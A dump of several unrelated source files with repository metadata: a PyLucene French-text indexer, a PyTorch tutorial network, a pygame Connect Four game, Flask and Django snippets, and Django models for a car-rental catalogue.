min_child_weight=6,
gamma=0,
subsample=0.8,
colsample_bytree=0.8,
reg_alpha=0.005,
objective= 'binary:logistic',
nthread=4,
scale_pos_weight=1,
seed=27)
modelfit(xgb4, train, test, predictors)
| [
"nan.zhao@outlook.com"
] | nan.zhao@outlook.com |
a5f144cda85255c89c8eae8cce97e66577ba1acd | 2e26a9fab5581759510b18002f32c7472b5e5991 | /Corpus/IndexFilesFr.py | 4daf4dfeb240a5f5bbfe2d73f1e5890bc88698a8 | [] | no_license | shilpadhagat/InformationRetrievalProject-EnglishtoFrenchQueryTranslation | 02f3b514bef6ec3d3171e71c96c1969150dd69f7 | fa89d6e7d85b0ce9bdd2116239b512e2a06b3e55 | refs/heads/master | 2021-01-21T20:11:16.103327 | 2017-05-23T17:55:32 | 2017-05-23T17:55:32 | 92,201,623 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,689 | py | #!/usr/bin/env python
INDEX_DIR = "IndexFilesFR.index."
import sys, os, lucene, threading, time
from datetime import datetime
from java.nio.file import Paths
from org.apache.lucene.analysis.miscellaneous import LimitTokenCountAnalyzer
from org.apache.lucene.analysis.standard import StandardAnalyzer
from org.apache.lucene.document import Document, Field, FieldType
from org.apache.lucene.index import \
FieldInfo, IndexWriter, IndexWriterConfig, IndexOptions
from org.apache.lucene.store import SimpleFSDirectory
from org.apache.lucene.analysis.fr import FrenchAnalyzer
"""
This class is loosely based on the Lucene (java implementation) demo class
org.apache.lucene.demo.IndexFiles. It will take a directory as an argument
and will index all of the files in that directory and downward recursively.
It will index on the file path, the file name and the file contents. The
resulting Lucene index will be placed in the current directory and called
'index'.
"""
class Ticker(object):
def __init__(self):
self.tick = True
def run(self):
while self.tick:
sys.stdout.write('.')
sys.stdout.flush()
time.sleep(1.0)
class IndexFiles(object):
"""Usage: python IndexFiles <doc_directory>"""
def __init__(self, root, storeDir, analyzer):
if not os.path.exists(storeDir):
os.mkdir(storeDir)
store = SimpleFSDirectory(Paths.get(storeDir))
analyzer = LimitTokenCountAnalyzer(analyzer, 1048576, True) #no token limit
config = IndexWriterConfig(analyzer)
config.setOpenMode(IndexWriterConfig.OpenMode.CREATE)
writer = IndexWriter(store, config)
self.indexDocs(root, writer)
ticker = Ticker()
print 'commit index',
threading.Thread(target=ticker.run).start()
writer.commit()
writer.close()
ticker.tick = False
print 'done'
def indexDocs(self, root, writer):
t1 = FieldType()
t1.setStored(True)
t1.setTokenized(False)
t1.setIndexOptions(IndexOptions.DOCS_AND_FREQS)
t2 = FieldType()
t2.setStored(False)
t2.setTokenized(True)
t2.setIndexOptions(IndexOptions.DOCS_AND_FREQS_AND_POSITIONS)
for root, dirnames, filenames in os.walk(root):
for filename in filenames:
if not filename.endswith('.rtf'):
continue
print "adding", filename
try:
path = os.path.join(root, filename)
file = open(path)
contents = unicode(file.read(), 'iso-8859-1')
file.close()
doc = Document()
doc.add(Field("name", filename, t1))
doc.add(Field("path", root, t1))
if len(contents) > 0:
doc.add(Field("contents", contents, t2))
else:
print "warning: no content in %s" % filename
writer.addDocument(doc)
except Exception, e:
print "Failed in indexDocs:", e
if __name__ == '__main__':
if len(sys.argv) < 2:
print IndexFiles.__doc__
sys.exit(1)
lucene.initVM(vmargs=['-Djava.awt.headless=true'])
print 'lucene', lucene.VERSION
start = datetime.now()
try:
base_dir = os.path.dirname(os.path.abspath(sys.argv[0]))
IndexFiles(sys.argv[1], os.path.join(base_dir, INDEX_DIR),
FrenchAnalyzer())
end = datetime.now()
print end - start
except Exception, e:
print "Failed: ", e
raise e
| [
"shilpa.dhagat15@gmail.com"
] | shilpa.dhagat15@gmail.com |
00f161eb5f05db86e565d105802f85bd8687b657 | ceb35c85a8ab0203b3d1b89fa6b6e66ff39bd449 | /conf/wsgi.py | 857f89e7e5f42d31f61a172d734440212a0a61ed | [] | no_license | kyg3766/django001 | 8d68754198c33c8dd1c6446bdfbef39dffaa3b7f | fe0ac35cbfbc2ba14fff3af455be33382baf0d19 | refs/heads/master | 2020-05-21T15:27:31.404706 | 2019-05-21T08:24:43 | 2019-05-21T08:24:43 | 186,091,172 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 395 | py | """
WSGI config for django001 project.
It exposes the WSGI callable as a module-level variable named ``application``.
For more information on this file, see
https://docs.djangoproject.com/en/2.2/howto/deployment/wsgi/
"""
import os
from django.core.wsgi import get_wsgi_application
os.environ.setdefault('DJANGO_SETTINGS_MODULE', 'django001.settings')
application = get_wsgi_application()
| [
"kyg3765@gmail.com"
] | kyg3765@gmail.com |
e1e70937d9a38b13566119952aec8004db6e8e40 | 286211702e50d6d29ee21dab902ed977e94382be | /pytorch/nn.py | 42e924ec23ce32c8bd88fbdd14fdea124a78b7c2 | [] | no_license | AustinArrington87/dev_practice | bcda3468a4607a2301ac572ee61d4548f34297df | 54796072388ed6e1a40417d5395d8927dea2acfa | refs/heads/master | 2021-05-19T08:55:25.407499 | 2021-01-11T02:07:16 | 2021-01-11T02:07:16 | 251,615,278 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,495 | py | # update weights in neural net /
# weight = weight*learning_rate * gradient
import torch
import torch.nn as nn
import torch.nn.functional as F
import torch.optim as optim
class Net(nn.Module):
def __init__(self):
super(Net, self).__init__()
# 1 input image channel, 6 output channels, 3x3 square convolution
# kernel
self.conv1 = nn.Conv2d(1, 6, 3)
self.conv2 = nn.Conv2d(6, 16, 3)
# an affine operation: y = Wx + b
self.fc1 = nn.Linear(16 * 6 * 6, 120) # 6*6 from image dimension
self.fc2 = nn.Linear(120, 84)
self.fc3 = nn.Linear(84, 10)
def forward(self, x):
# Max pooling over a (2, 2) window
x = F.max_pool2d(F.relu(self.conv1(x)), (2, 2))
# If the size is a square you can only specify a single number
x = F.max_pool2d(F.relu(self.conv2(x)), 2)
x = x.view(-1, self.num_flat_features(x))
x = F.relu(self.fc1(x))
x = F.relu(self.fc2(x))
x = self.fc3(x)
return x
def num_flat_features(self, x):
size = x.size()[1:] # all dimensions except the batch dimension
num_features = 1
for s in size:
num_features *= s
return num_features
net = Net()
print(net)
params = list(net.parameters())
print(len(params))
print(params[0].size()) # conv1's .weight
input = torch.randn(1, 1, 32, 32)
out = net(input)
print(out)
net.zero_grad()
out.backward(torch.randn(1, 10))
# calculate MSE - loss .
output = net(input)
target = torch.randn(10) # a dummy target, for example
target = target.view(1, -1) # make it the same shape as output
criterion = nn.MSELoss()
loss = criterion(output, target)
print(loss)
print(loss.grad_fn) # MSELoss
print(loss.grad_fn.next_functions[0][0]) # Linear
print(loss.grad_fn.next_functions[0][0].next_functions[0][0]) # ReLU
# backpropogate error
net.zero_grad() # zeroes the gradient buffers of all parameters
print('conv1.bias.grad before backward')
print(net.conv1.bias.grad)
loss.backward()
print('conv1.bias.grad after backward')
print(net.conv1.bias.grad)
# update weights
learning_rate = 0.01
for f in net.parameters():
f.data.sub_(f.grad.data * learning_rate)
# create your optimizer
optimizer = optim.SGD(net.parameters(), lr=0.01)
# in your training loop:
optimizer.zero_grad() # zero the gradient buffers
output = net(input)
loss = criterion(output, target)
loss.backward()
optimizer.step() # Does the update
| [
"austinarrington@Austins-MacBook-Pro.local"
] | austinarrington@Austins-MacBook-Pro.local |
ea87ce63693c7e88b7432ae72ea94603402ec4c1 | 11c7f9fb9468239cee3a611a26a3d1023712fd16 | /example/forms.py | 0afa940254e7f00c5539789167105c41bb3b4f44 | [] | no_license | r1s/baseflask | aa519ef21635ed6aa358850ddb77e1475042865b | fcfb1c31673c427819952e4887dd1c8b7effabe4 | refs/heads/master | 2021-01-22T02:08:17.091653 | 2014-09-30T11:21:21 | 2014-09-30T11:21:21 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 378 | py | from flask.ext.wtf import Form
from wtforms import StringField, PasswordField, SubmitField
from wtforms.validators import DataRequired
from flask.ext.babel import gettext as _
class ExampleForm(Form):
title = StringField('title', validators=[DataRequired()])
description = PasswordField('description', validators=[DataRequired()])
submit = SubmitField(_('save')) | [
"roman87.r1s@gmail.com"
] | roman87.r1s@gmail.com |
2002fa3d51540a011e0f86e28df864baf19415c5 | c4e77254221663ac63f3398241c57db8bee384f9 | /connect42 copy.py | e8912adeaf7d6d9dee5fb2d86f2e9d7326eee72e | [
"MIT"
] | permissive | yijiehuang0/connect4AI | dc7801bbb11bfe73c6dd851f6123b20a73284767 | 5a134ded8009fd51210a96ba2169920bf1b19aa8 | refs/heads/master | 2020-07-16T10:29:44.982273 | 2019-09-02T04:05:32 | 2019-09-02T04:05:32 | 205,771,719 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,952 | py | import numpy as np
import pygame
import sys
import math
ROW_COUNT = 6
COLUMN_COUNT = 7
BLUE = (0, 0 ,230)
BLACK = (0,0,0)
RED = (255, 0, 0)
YELLOW = (255, 255, 0)
def create_board():
board = np.zeros((ROW_COUNT,COLUMN_COUNT))
return board
def drop_peice(col, board, row, peice):
board[row][col] = peice
def is_valid_location(col, board):
return board[ROW_COUNT-1][col] == 0
def get_next_open_row(col, board):
for r in range(ROW_COUNT):
if board[r][col] == 0:
return r
def print_board(board):
print(np.flipud(board))
def winning_move(board, peice):
#horizontal locations for win
for c in range(COLUMN_COUNT-3):
for r in range(ROW_COUNT):
if board[r][c] == peice and board[r][c+1] == peice and board[r][c+2] == peice and board[r][c+3] == peice:
return True
#vertical locations for win
for c in range(COLUMN_COUNT):
for r in range(ROW_COUNT-3):
if board[r][c] == peice and board[r+1][c] == peice and board[r+2][c] == peice and board[r+3][c] == peice:
return True
#Check Positive Slope Diagonals
for c in range(COLUMN_COUNT-3):
for r in range(ROW_COUNT-3):
if board[r][c] == peice and board[r+1][c+1] == peice and board[r+2][c+2] == peice and board[r+3][c+3] == peice:
return True
#Check Negative Slope Diagonals
for c in range(COLUMN_COUNT-3):
for r in range(3, ROW_COUNT):
if board[r][c] == peice and board[r-1][c+1] == peice and board[r-2][c+2] == peice and board[r-3][c+3] == peice:
return True
def draw_board(board):
for c in range(COLUMN_COUNT):
for r in range(ROW_COUNT):
pygame.draw.rect(screen, BLUE, (c*SQUARESIZE, r*SQUARESIZE+SQUARESIZE, SQUARESIZE, SQUARESIZE))
pygame.draw.circle(screen, BLACK, (int(c*SQUARESIZE+SQUARESIZE/2), int(r*SQUARESIZE+SQUARESIZE+SQUARESIZE/2)), RADIUS)
for c in range(COLUMN_COUNT):
for r in range(ROW_COUNT):
if board[r][c] == 1:
pygame.draw.circle(screen, RED, (int(c*SQUARESIZE+SQUARESIZE/2), height-int(r*SQUARESIZE+SQUARESIZE/2)), RADIUS)
elif board[r][c] == 2:
pygame.draw.circle(screen, YELLOW, (int(c*SQUARESIZE+SQUARESIZE/2), height-int(r*SQUARESIZE+SQUARESIZE/2)), RADIUS)
pygame.display.update()
board = create_board()
#print_board(board)
game_over = False
playerturn = 0
pygame.init()
SQUARESIZE = 100
RADIUS = int(SQUARESIZE/2 - 5)
width = COLUMN_COUNT * SQUARESIZE
height = (ROW_COUNT+1) * SQUARESIZE
size = (width, height)
screen = pygame.display.set_mode(size)
draw_board(board)
pygame.display.update()
font = pygame.font.SysFont("monospace", 75)
while not game_over:
for event in pygame.event.get():
if event.type == pygame.QUIT:
sys.exit()
if event.type == pygame.MOUSEMOTION:
pygame.draw.rect(screen, BLACK, (0,0,width,SQUARESIZE))
posx = event.pos[0]
if playerturn == 0:
pygame.draw.circle(screen, RED, (posx, int(SQUARESIZE/2)), RADIUS)
else:
pygame.draw.circle(screen, YELLOW, (posx, int(SQUARESIZE/2)), RADIUS)
pygame.display.update()
if event.type == pygame.MOUSEBUTTONDOWN:
# print(event.pos)
pygame.draw.rect(screen, BLACK, (0,0,width,SQUARESIZE))
if playerturn == 0:
posx = event.pos[0]
col = int(math.floor(posx/SQUARESIZE))
if is_valid_location(col, board):
row = get_next_open_row(col, board)
drop_peice(col, board, row, 1)
if winning_move(board, 1):
print("Player 1 Wins!")
label = font.render("Player 1 Wins!!!", 1, RED)
screen.blit(label, (40,10))
game_over = True
else:
posx = event.pos[0]
col = int(math.floor(posx/SQUARESIZE))
if is_valid_location(col, board):
row = get_next_open_row(col, board)
drop_peice(col, board, row, 2)
if winning_move(board, 2):
print("Player 2 Wins!")
label = font.render("Player 2 Wins!!!", 1, YELLOW)
screen.blit(label, (40,10))
game_over = True
print_board(board)
draw_board(board)
playerturn +=1
playerturn = playerturn%2
if game_over:
pygame.time.wait(8000)
| [
"noreply@github.com"
] | noreply@github.com |
7e8eed3e3e234e712b3ae2ebb9a56d9680629cb5 | 64a955664b82be8ed149d01149b36a8aac626f8e | /chapter5/p5.py | 5ed71fd3dd2d87de56d123944936a15d519c8c03 | [] | no_license | JoelDavisP/Python-Practice-Book-Solutions | b60371590d8aaecab9de6ccad2bf2efb7a2f90ae | ea298d35e50d3719d5b0b841748abfd0c852cc95 | refs/heads/master | 2021-07-14T04:52:40.678170 | 2017-10-18T13:26:50 | 2017-10-18T13:26:50 | 105,724,396 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 652 | py | import os
import sys
def lines_py():
"""It compute the total number of lines of code in all python files
(.py extension) in a specified directory recursively. """
dname = sys.argv[1]
dpath = os.path.abspath(dname)
line_count = 0
for fpath,dnames,fnames in os.walk(dpath):
for i in fnames:
j = os.path.join(fpath,i)
if i.split('.')[1] == 'py':
fn = open(j, 'r')
for j in fn.readlines():
line_count += 1
yield line_count
y = lines_py()
while True:
print y.next()
| [
"joeldavisp17195@gmail.com"
] | joeldavisp17195@gmail.com |
744ddd93eafd9e17d9a6f19e8f7f8dce9e306791 | a67d25a28df71edbc537de56a32156534b23f12d | /src/main.py | 9994360e0fb58cbe7ec630d197cd0bf48ad845c9 | [
"MIT"
] | permissive | deviantdear/Python_Webscraper | 0f90c5bb963c7af1e778f11a7447664d5c9e1c32 | 0dec8c673dbeac7f243d39834dd1fdd50cffd61c | refs/heads/master | 2020-04-08T10:43:49.212171 | 2018-12-03T18:40:19 | 2018-12-03T18:40:19 | 159,280,018 | 0 | 0 | MIT | 2018-12-03T18:40:20 | 2018-11-27T05:18:40 | null | UTF-8 | Python | false | false | 1,051 | py | import threading
from queue import Queue
from spider import Spider
from domain import *
from webscraper import *
PROJECT_NAME = 'thesite'
HOMEPAGE = 'http://manonthemoonstudio.com'
DOMAIN_NAME = get_domain_name(HOMEPAGE)
QUEUE_FILE = PROJECT_NAME + '/queue.txt'
CRAWLED_FILE = PROJECT_NAME + '/crawled.txt'
NUMBER_OF_THREADS = 8
queue = Queue
Spider(PROJECT_NAME, HOMEPAGE, DOMAIN_NAME)
def crawl():
queued_links = file_to_set(QUEUE_FILE)
if len(queued_links) > 0:
print(str(len(queued_links)) + ' Links in the queue')
create_jobs()
def create_jobs():
for link in file_to_set(QUEUE_FILE):
queue.put(link)
queue.join()
crawl()
def create_workers():
for _ in range(NUMBER_OF_THREADS):
t = threading.Thread(target=work)
t.daemon = True
t.start()
def work():
while True:
url = queue.get()
Spider.crawl_page(threading.current_thread().name, url)
queue.task_done()
create_workers()
crawl()
| [
"deviantdear@gmail.com"
] | deviantdear@gmail.com |
18358b4bfeee8c7fb31e081a3851426236e2cb81 | d842ef7b24e73abfb979f851a41d671013fbc90e | /chode_or_not/manage.py | bc42b278aa48989330dcc9ba11e0b0559dacaf09 | [] | no_license | 2121159i/Chode-Or-Not-Prototype | 2803183626adcd2cdf136affa09f6697c1fdbe5e | 39871d1676370d443d87738f089bf9554b352002 | refs/heads/master | 2020-04-06T05:02:51.406612 | 2016-07-17T22:42:55 | 2016-07-17T22:42:55 | 56,404,178 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 255 | py | #!/usr/bin/env python
import os
import sys
if __name__ == "__main__":
os.environ.setdefault("DJANGO_SETTINGS_MODULE", "chode_or_not.settings")
from django.core.management import execute_from_command_line
execute_from_command_line(sys.argv)
| [
"airikov95@gmail.com"
] | airikov95@gmail.com |
2372f2175929e510edb3aa5c5b0f4d948aceeaca | 0f2c9b00bb38888037dc258dedf3c74a713e2954 | /catalog/models.py | 9dd76a30b972df6776551c10388c7e00697da32b | [] | no_license | MaxonKush/VS | e1426523899e3d587ee20d3845b3a0203c18fb67 | 1bb6224f0eca088812dbd8ee5396732363942c35 | refs/heads/master | 2023-03-08T11:59:38.705068 | 2020-12-06T22:44:15 | 2020-12-06T22:44:15 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 5,021 | py | from django.db import models
from django.core.exceptions import ValidationError
from django.urls import reverse
def validate_even(value):
if value <= 0:
raise ValidationError('%s Введите корректное значение' % value)
class Auto(models.Model):
TRANSMISSION = (
('АКПП', 'АКПП'),
('МКПП', 'МКПП'),
)
BODY_TYPE = (
('Седан', 'Седан'),
('Универсал', 'Универсал'),
('Хэтчбэк', 'Хэтчбэк'),
('Купе', 'Купе'),
('Лифтбэк', 'Лифтбэк'),
('Внедорожник', 'Внедорожник'),
('Родстер', 'Родстер'),
)
FUEL_TYPE = (
('Бензин', 'Бензин'),
('Дизель', 'Дизель'),
('Гибрид', 'Гибрид'),
)
COLOR = (
('Красный', 'Красный'),
('Синий', 'Синий'),
('Чёрный', 'Чёрный'),
('Зеленый', 'Зеленый'),
('Серый', 'Серый'),
('Белый', 'Белый'),
('Оранжевый', 'Оранжевый'),
('Жёлтый', 'Жёлтый'),
('Коричневый', 'Коричневый'),
)
BRAND=(
('Audi', 'Audi'),
('BMW', 'BMW'),
('Chevrolet', 'Chevrolet'),
('Citroen', 'Citroen'),
('Ford', 'Ford'),
('Geely', 'Geely'),
('Honda', 'Honda'),
('Hyundai', 'Hyundai'),
('Kia', 'Kia'),
('LADA', 'LADA'),
('Lexus', 'Lexus'),
('Mazda', 'Mazda'),
('Mercedec-Benz', 'Mercedec-Benz'),
('Mitsubishi', 'Mitsubishi'),
('Nissan', 'Nissan'),
('Opel', 'Opel'),
('Peugeot', 'Peugeot'),
('Range Rover', 'Range Rover'),
('Renault', 'Renault'),
('Skoda', 'Skoda'),
('Toyota', 'Toyota'),
('Volkswagen', 'Volkswagen'),
('Volvo', 'Volvo'),
)
PLACES=(
('2', '2'),
('4', '4'),
('5', '5'),
('7', '7'),
)
brand = models.CharField('Марка', max_length=50, choices=BRAND)
model = models.CharField('Модель', max_length=50)
body_type = models.CharField('Тип кузова', max_length=50, choices=BODY_TYPE)
number = models.CharField('Номер', max_length=5, unique=True)
date_of_issue = models.DateField('Дата выпуска')
color = models.CharField('Цвет', max_length=50, choices=COLOR)
engine = models.FloatField('Объём двигателя (л.)', max_length=50, validators=[validate_even])
transmission = models.CharField('Тип КП', max_length=50, choices=TRANSMISSION)
consumption_per_100 = models.FloatField('Расход (на 100 км.)', max_length=50, validators=[validate_even])
price_per_day = models.DecimalField('Цена в день (Br)', max_digits=18, decimal_places=2, validators=[validate_even])
condition = models.BooleanField('Доступна', default=True)
reserve = models.CharField('Запас хода (км.)', max_length=5)
places = models.CharField('Места', max_length=2, choices=PLACES)
capacity = models.CharField('Багажник (л.)', max_length=5)
fuel = models.CharField('Топливо', max_length=50, choices=FUEL_TYPE)
power = models.CharField('Мощность (л.с.)', max_length=4)
foto = models.ImageField('Фото', upload_to='catalog/')
# def __str__(self):
# template = '{0.id} {0.brand} {0.model}'
#return template.format(self)
def get_absolute_url(self):
return reverse('carsingle',
args=[self.id])
def __str__(self):
return '{}, {}, {}'.format(self.id, self.brand, self.number)
class Road_Accident(models.Model):
id_auto = models.ForeignKey(Auto, on_delete=models.CASCADE)
#id_auto = models.ForeignKey(Auto, on_delete=models.CASCADE)
#id_auto = models.ForeignKey(Auto, on_delete=models.CASCADE)
date_road_accident = models.DateField('Дата ДТП')
defect = models.TextField('Повреждения')
def __str__(self):
return '{}'.format(self.id)
class Service(models.Model):
id_auto = models.ForeignKey(Auto, on_delete=models.CASCADE)
id_road_accident = models.ForeignKey(Road_Accident, on_delete=models.CASCADE)
date_of_start = models.DateTimeField('Дата начала ремонта')
date_of_end = models.DateTimeField('Дата окончания ремонта')
repair_description = models.TextField('Описание работ')
def __str__(self):
return '{}'.format(self.id)
def save(self, *args, **kwargs):
if(self.date_of_end > self.date_of_start):
super(Service, self).save(*args, **kwargs)
else:
raise Exception("Время окончания ремонта не может быть раньше времени начала ремонта") | [
"maksimkushnerov@yandex.by"
] | maksimkushnerov@yandex.by |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.